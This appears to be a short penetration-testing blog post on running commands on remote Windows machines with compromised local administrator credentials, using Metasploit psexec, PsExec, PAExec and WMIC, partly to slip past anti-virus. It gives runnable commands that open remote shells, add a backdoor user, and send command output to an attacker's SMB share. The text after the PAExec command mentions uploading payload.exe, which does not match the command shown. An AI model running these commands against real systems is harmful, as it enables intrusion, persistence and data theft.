Alternative ways to: Run Windows Commands Remotely

Most Penetration Testers will know and love Metasploit’s PsExec module for running commands on remote Windows machines, if you’re not familiar with it – it allows you to take a compromised Local Administrator account and use it to execute commands on the remote machine (or to upload Meterpreter of course! These methods all require the ability to write to Admin$ on the remote machine, which basically means a Local Administrator account.

Metasploit’s PsExec

It’s available in Metasploit under exploit/windows/smb/psexec and all it requires is an RHOST, SMBUser and SMBPass:

Sometimes however, the psexec module from Metasploit gets eaten by Anti-virus engines, which is frustrating and delays a tester going about their work. So he’re a couple of tricks for getting around AV quickly – for when you just want to run your commands and get back to Starbucks.

PsTools and PsExec

Although Meterpreter’s PsExec is often picked up by anti-virus, I personally find that the original PsTool PsExec isn’t! Which is most convenient, download it here and give it a try:

It works something like this:

psexec \\TargetIP -u Admin -p Password1 cmd (Where "cmd" requests that it spawns an interactive command shell)  

PowerAdmin with PaExec

A nice alternative to PsExec is PaExec available here:, its usage is basically the same, try this:

PAExec \\TargetIP -u Admin -p Password1 -s cmd.exe 

This will upload payload.exe to the remote machine and execute it!


Finally, when all else fails I pull out WMIC, which although it’s an older method it seems to have fallen out of usage and many testers I’ve worked with are either unaware of it, or have forgotten of its existence. Easy to use though, something like this:

wmic /node:TargetIP /username:Admin /password:Password1 process call create "add user hacker Hacker1 /add" 

The commands here execute blindly, which any Tester worth her salt can deal with, but a quick hack will get you the command output. Spin up a network share that can be written by the compromised user (or “Everybody”) and you can redirect the output to an SMB share!

wmic /node:TargetIP /username:Admin /password:Password1 process call create "ipconfig >> \\Attacker\IPresults.txt" 

So that’s few different ways of achieving the same thing, but generally it’s always good to have a Plan B and C, especially when anti-virus is getting a bit big for its boots!